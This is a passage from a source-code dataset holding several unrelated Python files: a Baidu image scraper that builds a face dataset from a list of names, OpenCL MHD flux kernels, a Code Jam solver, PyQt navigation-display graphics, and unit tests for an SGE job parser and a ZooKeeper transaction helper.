# Build the list of search-result URLs\r\ndef buildUrls(word):\r\n    word = urllib.parse.quote(word)\r\n    url = r\"http://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&fp=result&queryWord={word}&cl=2&lm=-1&ie=utf-8&oe=utf-8&st=-1&ic=0&word={word}&face=0&istype=2nc=1&pn={pn}&rn=60\"\r\n    #urls = (url.format(word=word, pn=x) for x in itertools.count(start=0, step=60))\r\n    urls = (url.format(word=word, pn=x) for x in range (0,360,60)) #sets how many images to download\r\n    return urls\r\n\r\n# Parse the JSON to extract image URLs\r\nre_url = re.compile(r'\"objURL\":\"(.*?)\"')\r\ndef resolveImgUrl(html):\r\n    imgUrls = [decode(x) for x in re_url.findall(html)]\r\n    return imgUrls\r\n\r\ndef downImg(imgUrl, dirpath, imgName):\r\n    filename = os.path.join(dirpath, imgName)\r\n    #string_1 = save_path + \"/\" + spelling_name + \"/\" + spelling_name +'_'+str(i) + '.jpg' \r\n    try:\r\n        res = requests.get(imgUrl, timeout=15)\r\n        if str(res.status_code)[0] == \"4\":\r\n            print(str(res.status_code), \":\" , imgUrl)\r\n            return False\r\n    except Exception as e:\r\n        print(\"Exception raised:\", imgUrl)\r\n        print(e)\r\n        return False\r\n    with open(filename, \"wb\") as f:\r\n        f.write(res.content)\r\n    return True\r\n\r\n\r\n#def mkDir(dirName):\r\n#    dirpath = os.path.join(sys.path[0], dirName)\r\n#    if not os.path.exists(dirpath):\r\n#        os.mkdir(dirpath)\r\n#    return dirpath\r\n\r\ndef mkdir(file_name,save_path):  \r\n    save_path = save_path.strip()  \r\n    # check whether the path already exists  \r\n    isExists = os.path.exists(file_name)  \r\n    if not isExists:  \r\n        print( u'Created a new folder named', file_name )  \r\n        # create the directory  \r\n        os.makedirs(save_path + \"/\" +file_name)  \r\n        return True  \r\n    else:  \r\n        # if the directory already exists, do not create it and just report that  \r\n        print( u'The folder named', file_name, u'has already been created' )  \r\n        return False  \r\n\r\n\r\ndef read_txt(txt_path):\r\n    names = []\r\n    with open(txt_path,\"r\") as f:\r\n        for line in f.readlines()[0:]:\r\n            pair = line.strip().split()\r\n            names.append(pair)\r\n    return np.array(names)\r\n\r\n\r\nif __name__ == '__main__':\r\n    txt_path = \"D:/X/facenet/Generate_AFDB/new_name3.txt\"\r\n    names = read_txt(txt_path)\r\n    print(\"Successfully read the TXT file\")\r\n    save_path = \"D:/X/facenet/Generate_AFDB/AFDB\"\r\n    print(\"Download save path: \" + save_path)\r\n    print(\"=\" * 50)\r\n    j = 0\r\n    for k in range (len(names)):\r\n        word = names[k,0]\r\n        mkdir(names[k,1],save_path) \r\n        # dirpath = mkDir(\"results\")\r\n        urls = buildUrls(word)\r\n        index = 0\r\n        \r\n        \r\n        for url in urls:\r\n            print(\"Requesting:\", url)\r\n            try:\r\n                \r\n                html = requests.get(url, timeout=20).content.decode('utf-8')\r\n                imgUrls = resolveImgUrl(html)\r\n                if len(imgUrls) == 0: # stop if there are no more images\r\n                    break\r\n                dirpath = save_path + \"/\" + names[j,1]\r\n                for url in imgUrls:\r\n                    if downImg(url, dirpath, str(index) + \".jpg\"):\r\n                        index += 1\r\n                        print(\"Downloaded %s images\" % index)\r\n            except:\r\n                continue \r\n        j=j+1\r\n\r\n#http://lovenight.github.io/2015/11/15/Python-3-%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%B8%8B%E8%BD%BD%E7%99%BE%E5%BA%A6%E5%9B%BE%E7%89%87%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C/\r\n","sub_path":"Setup_dataset/Download_picture.py","file_name":"Download_picture.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"71793100","text":"# FLUXES\n\nimport numpy as np\n\nimport pyopencl.array as cl_array\nimport pyopencl.clmath as clm\n\nimport loopy as lp\nfrom loopy.version import LOOPY_USE_LANGUAGE_VERSION_2018_2\nfrom pyHARM.loopy_tools import *\n\nfrom pyHARM.defs import Loci\nfrom pyHARM.phys import get_state, prim_to_flux, mhd_vchar\nfrom pyHARM.reconstruction import reconstruct\n\nfrom pyHARM.debug_tools import plot_var, plot_prims\n\n# If there's a better way to do statics than globals, I'm all ears\nknl_flux_ct_emf = None; knl_flux_ct = None\nknl_addfluxes = None; knl_ctop = None\n\nemf1 = None; emf2 = None; emf3 = None\nPl = None; Pr = None\nUl = None; Ur = None\nfluxL = None; fluxR = None\n\nknl_ndt = None\nndt = None\ndef ndt_min(params, G, ctop):\n    sh = G.shapes\n\n    global knl_ndt\n    if knl_ndt is None:\n        # Note that ghost zones are already added where necessary!\n        # ndt is kept bulk only as this is all that's needed/makes sense\n        code = \"\"\"\n        ndt[i,j,k] = 1 / ( 1/(cour * dx[1] / ctop[1,i+ng,j+ng,k+ng]) +\n                           1/(cour * dx[2] / ctop[2,i+ng,j+ng,k+ng]) +\n                           1/(cour * dx[3] / ctop[3,i+ng,j+ng,k+ng]) )\n        \"\"\"\n        knl_ndt = lp.make_kernel(sh.isl_grid_scalar, code,\n                                 [*vecArrayArgs(\"ctop\"), ...])\n        knl_ndt = lp.fix_parameters(knl_ndt, cour=params['cour'])\n        knl_ndt = lp.fix_parameters(knl_ndt, ndim=4)\n        knl_ndt = tune_grid_kernel(knl_ndt, sh.bulk_scalar, ng=G.NG)\n        print(\"Compiled ndt min\")\n\n    global ndt\n    if ndt is None:\n        ndt = cl_array.zeros(params['queue'], sh.bulk_scalar, dtype=np.float64)\n\n    # TODO if debug print/record argmin?\n    evt, _ = knl_ndt(params['queue'], ctop=ctop, dx=G.dx_d, ndt=ndt)\n\n    # TODO manual reduce this? 
Loopy doesn't like reductions...\n return cl_array.min(ndt)\n\n\nctop = None\ndef get_flux(params, G, P):\n sh = G.shapes\n\n # Just need 4 elements -- filled below\n F = [0] * 4\n\n global Pl, Pr, ctop\n if Pl is None:\n Pl = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n Pr = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n ctop = cl_array.empty(params['queue'], sh.grid_vector, dtype=np.float64)\n\n # reconstruct left- and right-going components\n reconstruct(params, G, P, 1, lout=Pl, rout=Pr)\n # turn these into a net flux\n F[1], ctop[1] = lr_to_flux(params, G, Pl, Pr, 1, Loci.FACE1)\n\n reconstruct(params, G, P, 2, lout=Pl, rout=Pr)\n F[2], ctop[2] = lr_to_flux(params, G, Pl, Pr, 2, Loci.FACE2)\n\n reconstruct(params, G, P, 3, lout=Pl, rout=Pr)\n F[3], ctop[3] = lr_to_flux(params, G, Pl, Pr, 3, Loci.FACE3)\n\n if params['dt_static']:\n ndt = params['dt_start']\n else:\n ndt = ndt_min(params, G, ctop)\n\n return F, ndt\n\n\n# Note that the sense of L/R flips from zone to interface during function call\nDl = None; Dr = None\ndef lr_to_flux(params, G, Pr, Pl, dir, loc):\n s = G.slices\n sh = G.shapes\n\n # These return dicts of clArrays\n global Dl, Dr\n if Dl is None:\n Dl = get_state(params, G, Pl, loc)\n Dr = get_state(params, G, Pr, loc)\n else:\n get_state(params, G, Pl, loc, out=Dl)\n get_state(params, G, Pr, loc, out=Dr)\n\n cmaxL, cminL = mhd_vchar(params, G, Pl, Dl, loc, dir)\n cmaxR, cminR = mhd_vchar(params, G, Pr, Dr, loc, dir)\n\n global knl_ctop\n if knl_ctop is None:\n code = add_ghosts(\"\"\"\n <> cmax = if( cmaxL[i,j,k] > cmaxR[i,j,k], cmaxL[i,j,k], cmaxR[i,j,k])\n <> cmin = if(-cminL[i,j,k] > -cminR[i,j,k], -cminL[i,j,k], -cminR[i,j,k])\n cmax0 := if(0. > cmax, 0., cmax)\n cmin0 := if(0. 
> cmin, 0., cmin)\n ctop[i,j,k] = if(cmax0 > cmin0, cmax0, cmin0)\n \"\"\")\n knl_ctop = lp.make_kernel(sh.isl_grid_scalar, code,\n [*scalarArrayArgs(\"ctop\", \"cmaxL\", \"cmaxR\", \"cminL\", \"cminR\"), ...],\n assumptions=sh.assume_grid, default_offset=lp.auto,\n silenced_warnings='inferred_iname')\n # for var in [\"cmax\", \"cmin\", \"cmax0\", \"cmin0\"]:\n # knl_ctop = lp.assignment_to_subst(knl_ctop, var)\n knl_ctop = tune_grid_kernel(knl_ctop, sh.halo1_primitives, ng=G.NG-1)\n print(\"Compiled ctop\")\n\n ctop = cl_array.empty_like(cmaxL)\n evt, _ = knl_ctop(params['queue'], cmaxL=cmaxL, cmaxR=cmaxR, cminL=cminL, cminR=cminR, ctop=ctop)\n evt.wait()\n del cmaxL, cmaxR, cminL, cminR\n\n if 'debug' in params and params['debug']:\n # This is slow as it's host-bound\n if np.any(np.isnan((1/ctop).get()[s.bulkrh1])):\n raise ValueError(\"Ctop is 0 or NaN at {}\".format(np.argwhere(np.isnan(ctop.get()[s.bulkrh1]))[0]))\n\n global Ul, Ur, fluxL, fluxR\n if Ul is None:\n Ul = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n Ur = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n fluxL = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n fluxR = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n\n prim_to_flux(params, G, Pl, Dl, 0, loc, out=Ul)\n prim_to_flux(params, G, Pr, Dr, 0, loc, out=Ur)\n\n prim_to_flux(params, G, Pl, Dl, dir, loc, out=fluxL)\n prim_to_flux(params, G, Pr, Dr, dir, loc, out=fluxR)\n\n flux = cl_array.empty(params['queue'], sh.grid_primitives, dtype=np.float64)\n global knl_addfluxes\n if knl_addfluxes is None:\n code = add_ghosts(\"\"\"\n flux[p,i,j,k] = 0.5 * (fluxL[p,i,j,k] + fluxR[p,i,j,k] - ctop[i,j,k] * (Ur[p,i,j,k] - Ul[p,i,j,k]))\n \"\"\")\n knl_addfluxes = lp.make_kernel(sh.isl_grid_primitives, code,\n [*primsArrayArgs(\"flux\", \"fluxL\", \"fluxR\", \"Ul\", \"Ur\"),\n *scalarArrayArgs(\"ctop\"), ...],\n assumptions=sh.assume_grid,\n default_offset=lp.auto)\n knl_addfluxes = tune_prims_kernel(knl_addfluxes, sh.halo1_primitives, ng=G.NG-1)\n print(\"Compiled addfluxes\")\n\n evt, _ = knl_addfluxes(params['queue'], flux=flux, fluxL=fluxL, fluxR=fluxR, ctop=ctop, Ur=Ur, Ul=Ul)\n if params['profile']:\n evt.wait()\n\n return flux, ctop\n\n\ndef flux_ct(params, G, F):\n sh = G.shapes\n\n global knl_flux_ct, knl_flux_ct_emf\n global emf1, emf2, emf3\n if knl_flux_ct is None:\n # Flux constrained transport from Toth 2000\n # Implementation adapted from Ben Ryan's ebhlight code\n # TODO can use locals here if careful\n code_emf = replace_prim_names(add_ghosts(\"\"\"\n emf3[i, j, k] = 0.25*(F1[B2, i, j, k] + F1[B2, i, j - 1, k] \\\n - F2[B1, i, j, k] - F2[B1, i - 1, j, k])\n emf2[i, j, k] = -0.25*(F1[B3, i, j, k] + F1[B3, i, j, k - 1] \\\n - F3[B1, i, j, k] - F3[B1, i - 1, j, k])\n emf1[i, j, k] = 0.25*(F2[B3, i, j, k] + F2[B3, i, j, k - 1] \\\n - F3[B2, i, j, k] - F3[B2, i, j - 1, k])\n \"\"\"))\n code_flux = replace_prim_names(add_ghosts(\"\"\"\n F1[B1, i, j, k] = 0\n F1[B2, i, j, k] = 0.5 * (emf3[i, j, k] + emf3[i, j + 1, k])\n F1[B3, i, j, k] = -0.5 * (emf2[i, j, k] + emf2[i, j, k + 1])\n \n F2[B1, i, j, k] = -0.5 * (emf3[i, j, k] + emf3[i + 1, j, k])\n F2[B2, i, j, k] = 0\n F2[B3, i, j, k] = 0.5 * (emf1[i, j, k] + emf1[i, j, k + 1])\n \n F3[B1, i, j, k] = 0.5 * (emf2[i, j, k] + emf2[i + 1, j, k])\n F3[B2, i, j, k] = -0.5 * (emf1[i, j, k] + emf1[i, j + 1, k])\n F3[B3, i, j, k] = 0\n \"\"\"))\n\n knl_flux_ct_emf = lp.make_kernel(sh.isl_grid_primitives, code_emf,\n 
[*primsArrayArgs(\"F1\", \"F2\", \"F3\"),\n *scalarArrayArgs(\"emf1\", \"emf2\", \"emf3\"), ...],\n assumptions=sh.assume_grid)\n knl_flux_ct_emf = tune_prims_kernel(knl_flux_ct_emf, sh.halo1_primitives, ng=G.NG-1)\n\n knl_flux_ct = lp.make_kernel(sh.isl_grid_primitives, code_flux,\n [*primsArrayArgs(\"F1\", \"F2\", \"F3\"),\n *scalarArrayArgs(\"emf1\", \"emf2\", \"emf3\"), ...],\n assumptions=sh.assume_grid)\n knl_flux_ct = tune_prims_kernel(knl_flux_ct, sh.halo1_primitives, ng=G.NG-1)\n\n #knl_flux_ct = lp.set_options(knl_flux_ct, \"print_cl\")\n #print(knl_flux_ct)\n print(\"Compiled flux_ct\")\n\n emf1 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n emf2 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n emf3 = cl_array.empty(params['queue'], sh.grid_scalar, dtype=np.float64)\n\n # The queue is in-order for the foreseeable future. When it's not, we'll need a .wait() in here\n evt, _ = knl_flux_ct_emf(params['queue'], F1=F[1], F2=F[2], F3=F[3], emf1=emf1, emf2=emf2, emf3=emf3)\n evt, _ = knl_flux_ct(params['queue'], F1=F[1], F2=F[2], F3=F[3], emf1=emf1, emf2=emf2, emf3=emf3)\n\n # Similarly, we might care about whether everything's up-to-date when we relinquish control\n return F\n","sub_path":"pyHARM/fluxes.py","file_name":"fluxes.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"241562675","text":"import numpy as np\nfrom itertools import permutations\n\nfin = open('ain.txt', 'r')\nfout = open('aout.txt', 'w')\n\nT = int(fin.readline())\n\ndef valid(i):\n if len(i) == 1:\n return True\n x = []\n for j in range(len(i) // 2):\n if i[2*j] == i[2*j+1]:\n return False\n if i[2*j] == \"R\" and i[2*j+1] == \"P\":\n x += [\"P\"]\n elif i[2*j] == \"R\" and i[2*j+1] == \"S\":\n x += [\"R\"]\n elif i[2*j] == \"P\" and i[2*j+1] == \"R\":\n x += [\"P\"]\n elif i[2*j] == \"P\" and i[2*j+1] == \"S\":\n x += [\"S\"]\n elif i[2*j] == \"S\" and i[2*j+1] == \"R\":\n x += [\"R\"]\n elif i[2*j] == \"S\" and i[2*j+1] == \"P\":\n x += [\"S\"]\n return valid(x)\n\n\ndef solve():\n N, R, P, S = tuple([int(i) for i in fin.readline().split()])\n \n x = permutations(\"P\"*P + \"R\"*R + \"S\"*S)\n for i in x:\n if valid(list(i)):\n return ''.join(i)\n\n return \"IMPOSSIBLE\"\n\nfor i in range(T):\n fout.write(\"Case #\" + str(i+1) + \": \" + str(solve()) + \"\\n\")\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_4_1_neat/16_4_1_raynboz_a.py","file_name":"16_4_1_raynboz_a.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"79221705","text":"from PyQt5 import QtWidgets\r\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QBrush, QTransform, QFont, QFontMetrics\r\nfrom PyQt5.QtCore import Qt, QPointF\r\nfrom PyQt5 import QtGui\r\nimport numpy as np\r\nfrom constantParameters import *\r\nfrom navigationDisplay import *\r\n\r\n\r\n# Waypoints width\r\nWP_WIDTH = 2.5\r\nWP_DP = WP_WIDTH/2.\r\nTP_WIDTH = 10\r\nTP_DP = TP_WIDTH/2.\r\nASW = 2 # ASW stands for Arc Semi Width\r\n\r\n# Aircraft width\r\nAC_WIDTH = 10\r\n\r\n# Colors\r\nwhite = QColor(255, 255, 255)\r\ngreen = QColor(0, 255, 0)\r\n\r\n# Pens\r\nP_PEN = QPen(green, WP_DP)\r\nP_PEN.setCosmetic(True)\r\nTRAJ_PEN = QPen(green, ASW)\r\nTRAJ_PEN.setCosmetic(True)\r\nLEG_PEN = QPen(QColor(\"lightgrey\"), ASW)\r\nLEG_PEN.setCosmetic(True)\r\nROSE_PEN = QPen(white,ASW)\r\nROSE_PEN.setCosmetic(True)\r\nAC_PEN = 
QPen(QColor(255, 255, 0))\r\nAC_PEN.setCosmetic(True)\r\n\r\n# Brushes\r\nTP_BRUSH = QBrush(QColor(\"grey\"))\r\nWP_BRUSH = QBrush(QColor(\"red\"))\r\nAC_BRUSH = QBrush(QColor(\"white\")) # for the aircraft\r\n\r\n# Multiplier applied to arcs. A full circle = 360*16\r\nSP_ANGLE_COEFF = 16\r\n\r\n# ROSE\r\nLARGE_GRAD_LONG = 20\r\nTEXT_SIZE = 10\r\n\r\n# to get rid of integers and floats distinction in QGraphicsItem\r\nPRECISION_FACTOR = 100\r\n\r\n\r\ndef resize(x):\r\n return x*PRECISION_FACTOR\r\n\r\n\r\nclass QGraphicsArcItem(QtWidgets.QGraphicsEllipseItem):\r\n \"\"\"Graphics item that draws a circular arc,\r\n as the portion of the circle starting at start_angle and ending at\r\n start_angle + span_angle\"\"\"\r\n def __init__(self, start, centre, alpha, turnRadius, det, parent):\r\n self.det = det # determinant between the two segments of the transition\r\n self.set_XY(centre, turnRadius)\r\n self.w, self.h = resize(turnRadius*2), resize(turnRadius*2)\r\n super().__init__(self.x, self.y, self.w, self.h, parent)\r\n self.set_span_angle(alpha)\r\n self.start_angle = self.set_start_angle(start, centre)\r\n\r\n def paint(self, painter=QPainter(), style=None, widget=None):\r\n painter.setPen(TRAJ_PEN)\r\n if self.det < 0:\r\n painter.drawArc(self.x, self.y, self.w, self.h, self.start_angle, self.span_angle)\r\n else:\r\n painter.drawArc(self.x, self.y, self.w, self.h, self.start_angle, -self.span_angle)\r\n\r\n def set_span_angle(self, alpha):\r\n self.span_angle = alpha * SP_ANGLE_COEFF\r\n\r\n def set_start_angle(self, start, centre):\r\n if start.x - centre.x == 0:\r\n if self.det > 0:\r\n beta = -90\r\n else:\r\n beta = 90\r\n return beta * SP_ANGLE_COEFF\r\n else:\r\n beta = np.arctan((start.y - centre.y) / (start.x - centre.x)) * RAD2DEG\r\n if start.x < centre.x:\r\n return -(180 + beta) * SP_ANGLE_COEFF\r\n else:\r\n return -beta * SP_ANGLE_COEFF\r\n\r\n def set_XY(self, centre, turnRadius):\r\n self.x = resize(centre.x - turnRadius)\r\n self.y = resize(centre.y - turnRadius)\r\n\r\n\r\nclass QGraphicsWayPointsItem(QtWidgets.QGraphicsRectItem):\r\n \"\"\"Displays the waypoints\"\"\"\r\n\r\n def __init__(self, x, y, parent, name, view, current_hdg, zoom):\r\n self.x, self.y = resize(x), resize(y)\r\n super().__init__(self.x, self.y, resize(WP_WIDTH), resize(WP_WIDTH), parent)\r\n self.pen = P_PEN\r\n self.name = name\r\n self.view = view\r\n self.current_hdg = current_hdg\r\n self.parent = parent\r\n self.moveBy(-resize(WP_DP), -resize(WP_DP))\r\n self.textitem = QtWidgets.QGraphicsTextItem(self.parent)\r\n self.description()\r\n\r\n def description(self):\r\n \"\"\"Displays the waypoint IDs\"\"\"\r\n font = QFont()\r\n font_metric = QFontMetrics(font)\r\n text_width = font_metric.width(self.name)\r\n font.setWeight(resize(500 * TEXT_SIZE))\r\n self.textitem.setPos(self.x + resize(WP_WIDTH), self.y + resize(WP_WIDTH))\r\n self.textitem.setPlainText(self.name)\r\n self.textitem.setFont(font)\r\n self.textitem.setScale(10)\r\n self.textitem.setRotation(self.current_hdg)\r\n self.textitem.setDefaultTextColor(green)\r\n self.textitem.setTransform(self.view.transform())\r\n\r\n\r\nclass QGraphicsTransitionPoints(QtWidgets.QGraphicsRectItem):\r\n def __init__(self, x, y, parent):\r\n super().__init__(x, y, TP_WIDTH, TP_WIDTH, parent)\r\n self.x, self.y = resize(x), resize(y)\r\n self.paint(QPainter())\r\n\r\n def paint(self, painter, style=None, widget=None):\r\n painter.setPen(P_PEN)\r\n painter.setBrush(TP_BRUSH)\r\n # copy the transformation caused by the zoom\r\n t = 
painter.transform()\r\n m11, m22 = t.m11(), t.m22()\r\n\r\n # force the horizontal (m11) and vertical (m22) scale coefficients to 1\r\n painter.setTransform(QTransform(1, t.m12(), t.m13(), t.m21(), 1, t.m23(), t.m31(), t.m32(), t.m33()))\r\n\r\n painter.translate(-TP_DP, -TP_DP) # translate by -TP_DP to compensate for the item's thickness\r\n painter.drawRect(self.x * m11, self.y * m22, TP_WIDTH, TP_WIDTH)\r\n painter.restore()\r\n\r\n\r\nclass QGraphicsImaginaryPoints(QtWidgets.QGraphicsRectItem):\r\n \"\"\"Points used to determine the transition, not displayed on the ND\"\"\"\r\n def __init__(self, x, y, parent):\r\n super().__init__(x, y, TP_WIDTH, TP_WIDTH, parent)\r\n self.x, self.y = resize(x), resize(y)\r\n\r\n\r\nclass QGraphicsLegsItem(QtWidgets.QGraphicsLineItem):\r\n \"\"\"Displays the legs\"\"\"\r\n def __init__(self, x1, y1, x2, y2, parent):\r\n super().__init__(resize(x1), resize(y1), resize(x2), resize(y2), parent)\r\n self.pen = LEG_PEN\r\n\r\n\r\nclass AircraftItem(QtWidgets.QGraphicsItemGroup):\r\n \"\"\"The view of an aircraft in the GraphicsScene\"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"AircraftItem constructor, creates the ellipse and the pixmap image and adds them to the scene.\r\n Here the aircraft is defined by a pixmap image (to get an aircraft shape) but also by an ellipse placed\r\n under that image, because ellipses are easier to manipulate\"\"\"\r\n super().__init__(None)\r\n self.item2 = QtWidgets.QGraphicsEllipseItem()\r\n image = QtGui.QImage('plane4.png')\r\n self.pixmap = QtGui.QPixmap.fromImage(image)\r\n self.item = QtWidgets.QGraphicsPixmapItem(QtGui.QPixmap.fromImage(image))\r\n self.item.setScale(PRECISION_FACTOR)\r\n self.item2.setBrush(AC_BRUSH)\r\n self.addToGroup(self.item2)\r\n self.addToGroup(self.item)\r\n\r\n def update_position(self, x, y):\r\n x, y = resize(x), resize(y)\r\n self.item.setPos(x-51/2, y-51/2) # the image is 51x51 pixels\r\n\r\n\r\nclass QGraphicsRoseItem(QtWidgets.QGraphicsItemGroup):\r\n \"\"\"Groups all the items that make up the compass rose\"\"\"\r\n def __init__(self, sim, x, y, width, parent, view):\r\n self.x, self.y, self.w = x, y, width\r\n self.centre = (self.x + self.w / 2, self.y + self.w / 2)\r\n super().__init__(None)\r\n self.view = view\r\n self.parent = parent\r\n self.sim = sim\r\n\r\n font = QFont()\r\n font_metric = QFontMetrics(font)\r\n font.setWeight(TEXT_SIZE)\r\n for i in range(12): # build the rose\r\n i = i / RAD2DEG * 30\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2 + np.sin(i) * (LARGE_GRAD_LONG + 2.3 * TEXT_SIZE)\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2 + np.cos(i) * (LARGE_GRAD_LONG + 2.3 * TEXT_SIZE)\r\n hdg = QtWidgets.QGraphicsTextItem(self.parent)\r\n hdg.setFont(font)\r\n hdg.setTransform(self.view.transform())\r\n heading = round(i * RAD2DEG / 10)\r\n hdg.setPlainText(str(heading))\r\n hdg.setRotation(heading * 10)\r\n hdg.setPos(a_x, a_y)\r\n text_width = font_metric.width(str(round(i * RAD2DEG / 10)))\r\n hdg.moveBy(-np.cos(i) * text_width / 1.2, np.sin(i) * text_width / 1.2)\r\n hdg.setDefaultTextColor(white)\r\n self.addToGroup(hdg)\r\n\r\n def paint(self, painter=QPainter(), style=None, widget=None):\r\n painter.setPen(ROSE_PEN)\r\n\r\n # Large graduations\r\n for i in range(36):\r\n i = i / RAD2DEG * 10\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2\r\n b_x = a_x + np.sin(i) * LARGE_GRAD_LONG\r\n b_y = a_y + np.cos(i) * LARGE_GRAD_LONG\r\n l = painter.drawLine(a_x, a_y, 
b_x, b_y)\r\n self.addToGroup(l)\r\n\r\n # Small graduations\r\n for i in range(1, 72, 2):\r\n i = i / RAD2DEG * 5\r\n a_x = self.centre[0] + np.sin(i) * self.w / 2\r\n a_y = self.centre[1] + np.cos(i) * self.w / 2\r\n b_x = a_x + np.sin(i) * LARGE_GRAD_LONG / 2\r\n b_y = a_y + np.cos(i) * LARGE_GRAD_LONG / 2\r\n s = painter.drawLine(a_x, a_y, b_x, b_y)\r\n self.addToGroup(s)\r\n\r\n e = painter.drawEllipse(self.x, self.y, self.w, self.w)\r\n self.addToGroup(e)\r\n\r\n if self.sim.mode == \"SelectedHeading\": # draw the selected heading as a line starting\r\n # from the aircraft when in selected mode\r\n a_x2 = self.centre[0] + np.sin(float(self.sim.HDG_selected)/RAD2DEG)*self.w / 2\r\n a_y2 = self.centre[1] + np.cos(float(self.sim.HDG_selected)/RAD2DEG) * self.w / 2\r\n b_x2 = self.centre[0]\r\n b_y2 = self.centre[1]\r\n self.line = painter.drawLine(a_x2, a_y2, b_x2, b_y2)\r\n self.addToGroup(self.line)\r\n","sub_path":"graphicsItems.py","file_name":"graphicsItems.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"527716782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport datetime\n\nfrom sgeparse.parser import JobsParser\n\n\n@pytest.fixture\ndef parser(data):\n with open(data) as infile:\n return JobsParser(infile.read())\n\n\ndef test_parse_testdata(parser):\n assert parser.njobs > 5\n\n\ndef test_first_job(parser):\n assert parser.jobs[0] == {\n 'job_number': 1031650,\n 'priority': 0.60500,\n 'name': 'k2_3b802-20150513',\n 'owner': 'sw',\n 'state': 'r',\n 'start_time': datetime.datetime(2015, 5, 15, 13, 38, 8),\n 'queue': 'parallel',\n 'host': 'ngts08.local',\n 'slots': 12,\n }\n","sub_path":"testing/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"305812262","text":"import threading\nimport unittest\n\nfrom kazoo.exceptions import BadVersionError\n\nfrom pykit import rangeset\nfrom pykit import threadutil\nfrom pykit import ututil\nfrom pykit import zktx\nfrom pykit.zktx import COMMITTED\nfrom pykit.zktx import PURGED\nfrom pykit.zktx import STATUS\n\ndd = ututil.dd\n\nzk_tag = 'daocloud.io/zookeeper:3.4.10'\nzk_name = 'zk_test'\n\n\nclass PseudoKVAccessor(dict):\n\n def __init__(self, *args, **kwargs):\n\n super(PseudoKVAccessor, self).__init__(*args, **kwargs)\n\n self.lock = threading.RLock()\n\n def get(self, key):\n\n with self.lock:\n return super(PseudoKVAccessor, self).get(key)\n\n def set(self, key, value, version):\n\n with self.lock:\n\n prev = self[key]\n if prev[1] != version:\n raise BadVersionError()\n\n self[key] = (value, version+1)\n\n def set_or_create(self, key, value, version):\n\n with self.lock:\n\n if key in self:\n return self.set(key, value, version)\n else:\n if version == -1:\n self[key] = (value, 0)\n else:\n raise BadVersionError()\n\n def safe_delete(self, key, version=None):\n # for test of purge\n pass\n\n\nclass TxidsetAccessor(object):\n def __init__(self):\n self.lock = threading.RLock()\n self.ver = 0\n self.d = {}\n\n def get(self):\n with self.lock:\n for k in self.d:\n self.d[k] = rangeset.RangeSet(self.d[k])\n\n return self.d, self.ver\n\n def set(self, value, version=None):\n with self.lock:\n if version is not None and version != self.ver:\n raise BadVersionError()\n\n self.d = value\n self.ver = version + 1\n\n def set_or_create(self, key, value, version):\n return self.set(value, 
version)\n\n\nclass PseudoStorage(zktx.StorageHelper):\n\n conflicterror = BadVersionError\n\n def __init__(self):\n self.record = PseudoKVAccessor({\n 'foo': ([[1, 1], [17, 17]], 0),\n 'bar': ([[-1, None]], 1),\n })\n\n self.txidset = TxidsetAccessor()\n\n self.journal = PseudoKVAccessor({})\n\n\nclass TestTXStorageHelper(unittest.TestCase):\n\n def setUp(self):\n self.sto = PseudoStorage()\n\n def test_get_latest(self):\n\n rst = self.sto.record.get('foo')\n self.assertEqual(([[1, 1], [17, 17]], 0), rst)\n\n rst = self.sto.record.get('bar')\n self.assertEqual(([[-1, None]], 1), rst)\n\n def test_apply_record(self):\n\n cases = (\n (0, 'foo', 'fooval', (None, 0), '<=max txid'),\n (1, 'foo', 'fooval', (1, 0), '<=max txid'),\n (16, 'foo', 'fooval', (None, 0), '<=max txid'),\n (17, 'foo', 'fooval', (17, 0), '<=max txid'),\n (18, 'foo', 'fooval', ('fooval', 1), '>max txid'),\n (1, 'bar', 'barval', ('barval', 2), '>max txid'),\n (1, 'bar', 'barval', ('barval', 2), '<=max txid'),\n )\n\n for txid, key, value, expected, mes in cases:\n\n dd(txid, key, value, expected, mes)\n\n self.sto.apply_record(txid, key, value)\n\n rec, ver = self.sto.record.get(key)\n val_of_txid = dict(rec).get(txid)\n self.assertEqual(expected, (val_of_txid, ver))\n\n def test_apply_record_max_history(self):\n\n s, e = 100, 150\n for txid in range(s, e):\n self.sto.apply_record(txid, 'foo', txid)\n\n rec, ver = self.sto.record.get('foo')\n self.assertEqual(e-s, ver)\n self.assertEqual(self.sto.max_value_history, len(rec))\n\n def test_apply_record_concurrently(self):\n\n n_thread = 10\n n_repeat = 100\n\n self.sto.max_value_history = n_thread * n_repeat + 1\n\n l = threading.RLock()\n sess = {'txid': 0}\n success_tx = {-1: True}\n\n def _apply(ithread):\n for ii in range(n_repeat):\n\n with l:\n sess['txid'] += 1\n txid = sess['txid']\n\n if self.sto.apply_record(txid, 'bar', txid):\n with l:\n success_tx[txid] = True\n\n ths = 